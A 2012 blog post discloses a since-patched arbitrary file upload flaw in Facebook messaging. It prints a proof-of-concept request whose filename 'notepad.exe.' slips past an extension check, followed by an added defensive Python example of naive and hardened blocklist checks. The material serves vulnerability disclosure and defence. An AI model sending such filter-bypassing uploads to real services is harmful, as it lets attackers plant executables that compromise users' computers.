Thursday, May 3, 2012

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in

Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
POST /ajax/messaging/upload.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

Content-Disposition: form-data; name="post_form_id"

[information removed]
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
Content-Disposition: form-data; name="id"

[information removed]
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream

This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.
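
The filename in the request above ends in a dot (`notepad.exe.`). As an added example (not code from the original post or from Facebook), the Python below assumes the upload filter compared only the text after the last dot, and shows the same check applied after reducing the name to what Windows would store, since Windows drops trailing dots and spaces from filenames. The blocklist, function names and sample filenames are constructed for illustration.

```python
import re

# Constructed blocklist for this example; not Facebook's actual list.
BLOCKED_EXTENSIONS = {"exe", "scr", "bat", "cmd", "com", "pif", "msi"}


def final_extension(name: str) -> str:
    """Return the lower-cased text after the last dot, or '' if there is none."""
    _stem, dot, ext = name.rpartition(".")
    return ext.lower() if dot else ""


def naive_is_blocked(filename: str) -> bool:
    """Assumed weak check: looks at the raw client-supplied name only."""
    return final_extension(filename) in BLOCKED_EXTENSIONS


def canonical_name(filename: str) -> str:
    """Reduce a client-supplied filename to the name Windows would store."""
    # Keep only the last path component, whichever separator the client used.
    name = re.split(r"[\\/]", filename)[-1]
    # Windows silently strips trailing dots and spaces when creating a file.
    return name.rstrip(". ")


def hardened_is_blocked(filename: str) -> bool:
    """Apply the extension check to the canonical name, not the raw one."""
    name = canonical_name(filename)
    if not name:
        return True  # nothing usable is left after normalisation: reject
    return final_extension(name) in BLOCKED_EXTENSIONS


def audit(filenames):
    """Return (filename, naive verdict, hardened verdict) for each input."""
    return [(f, naive_is_blocked(f), hardened_is_blocked(f)) for f in filenames]


if __name__ == "__main__":
    # Constructed sample inputs; the second is the filename from the request.
    samples = ["notepad.exe", "notepad.exe.", "notepad.exe . ", "report.pdf"]
    for name, naive, hardened in audit(samples):
        print(f"{name!r:20} naive_blocked={naive!s:5} hardened_blocked={hardened}")
```

Storing uploads under a server-generated name and serving them with a fixed content type removes the dependence on the client-supplied filename altogether.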

Facebook White Hat
